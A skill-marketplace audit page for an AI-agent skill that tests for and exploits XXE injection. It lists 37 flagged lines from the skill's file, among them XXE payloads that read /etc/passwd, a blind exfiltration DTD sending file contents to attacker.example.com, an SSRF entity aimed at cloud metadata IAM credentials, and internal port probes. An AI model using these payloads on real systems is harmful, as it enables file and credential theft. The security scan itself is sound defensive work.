testing-for-xxe-injection-vulnerabilities

Enables security professionals to discover and exploit XXE injection vulnerabilities in XML processing applications.

Install this skill

0/100

Security score

The testing-for-xxe-injection-vulnerabilities skill was audited on Jun 14, 2026 and we found 37 security issues across 2 threat categories, including 3 critical. Review the findings below before installing.

Categories Tested

Security Issues

critical line 37

Access to /etc/passwd

SourceSKILL.md

37	- In-band file read: a response field reflects file content, e.g. `/etc/passwd` matching the regex `root:.*:0:0:`, or a base64 blob from `php://filter/convert.base64-encode/resource=...`.

critical line 39

Access to /etc/passwd

SourceSKILL.md

39	- Blind OOB DTD exfiltration: host an external DTD that reads a file and exfils it through a nested parameter entity to `http://attacker/?d=%file;` (use FTP for multi-line files like `/etc/pas

high line 93

Access to /etc/passwd

SourceSKILL.md

93	# Basic XXE payload to read /etc/passwd

high line 98

Access to /etc/passwd

SourceSKILL.md

98	<!ENTITY xxe SYSTEM "file:///etc/passwd">

high line 207

Access to /etc/passwd

SourceSKILL.md

207	<!ENTITY % file SYSTEM "file:///etc/passwd">

high line 226

Access to /etc/passwd

SourceSKILL.md

226	<!ENTITY xxe SYSTEM "file:///etc/passwd">

critical line 316

Access to /etc/passwd

SourceSKILL.md

316	A SOAP web service processes XML input without disabling external entities. Injecting a DTD with a SYSTEM entity in the SOAP body reads `/etc/passwd` and returns it in the SOAP response.

high line 339

Access to /etc/passwd

SourceSKILL.md

339	2. Include DTD with external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">

high line 344

Access to /etc/passwd

SourceSKILL.md

344	- Local file read: /etc/passwd, /etc/hostname, application config files

high line 351

Access to /etc/passwd

SourceSKILL.md

351	\| /etc/passwd \| 42 user accounts, service accounts identified \|

low line 38

External URL reference

SourceSKILL.md

38	- OOB entity callback: a classic or parameter entity (`<!ENTITY % xxe SYSTEM "http://<id>.oast.fun/x">`) triggers an inbound HTTP / DNS / FTP hit on `interactsh`/Collaborator — proves resoluti

low line 39

External URL reference

SourceSKILL.md

39	- Blind OOB DTD exfiltration: host an external DTD that reads a file and exfils it through a nested parameter entity to `http://attacker/?d=%file;` (use FTP for multi-line files like `/etc/pas

low line 68

External URL reference

SourceSKILL.md

68	"https://target.example.com/api/search"

low line 74

External URL reference

SourceSKILL.md

74	"https://target.example.com/api/search"

low line 84

External URL reference

SourceSKILL.md

84	-d '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><test/></soap:Body></soap:Envelope>' \

low line 85

External URL reference

SourceSKILL.md

85	"https://target.example.com/ws/service"

low line 101

External URL reference

SourceSKILL.md

101	"https://target.example.com/api/search"

low line 111

External URL reference

SourceSKILL.md

111	"https://target.example.com/api/search"

low line 121

External URL reference

SourceSKILL.md

121	"https://target.example.com/api/search"

low line 131

External URL reference

SourceSKILL.md

131	"https://target.example.com/api/search"

low line 147

External URL reference

SourceSKILL.md

147	<!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe-test">

low line 150

External URL reference

SourceSKILL.md

150	"https://target.example.com/api/search"

low line 159

External URL reference

SourceSKILL.md

159	<!ENTITY xxe SYSTEM "http://xxe-confirmed.abc123.oast.fun">

low line 162

External URL reference

SourceSKILL.md

162	"https://target.example.com/api/search"

low line 169

External URL reference

SourceSKILL.md

169	<!ENTITY % xxe SYSTEM "http://abc123.oast.fun/xxe-param">

low line 173

External URL reference

SourceSKILL.md

173	"https://target.example.com/api/search"

low line 185

External URL reference

SourceSKILL.md

185	<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.example.com/?data=%file;'>">

low line 198

External URL reference

SourceSKILL.md

198	<!ENTITY % dtd SYSTEM "http://attacker.example.com:8888/evil.dtd">

low line 202

External URL reference

SourceSKILL.md

202	"https://target.example.com/api/search"

low line 228

External URL reference

SourceSKILL.md

228	<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">

low line 237

External URL reference

SourceSKILL.md

237	"https://target.example.com/api/upload/avatar"

low line 263

External URL reference

SourceSKILL.md

263	<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

low line 266

External URL reference

SourceSKILL.md

266	"https://target.example.com/api/search"

low line 273

External URL reference

SourceSKILL.md

273	-d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:$port/\">]><root><search>&xxe;</search></root>" \

low line 274

External URL reference

SourceSKILL.md

274	"https://target.example.com/api/search" \| head -c 100

low line 283

External URL reference

SourceSKILL.md

283	<!ENTITY xxe SYSTEM "http://internal-admin.local:8080/admin">

low line 286

External URL reference

SourceSKILL.md

286	"https://target.example.com/api/search"

Scanned on Jun 14, 2026

View Security Dashboard

Installation guide →

GitHub Stars 606

Rate this skill

Categorydevelopment

UpdatedJune 15, 2026

openclaw testing api security-engineer data-analyst development data analytics

xalgord/xalgorix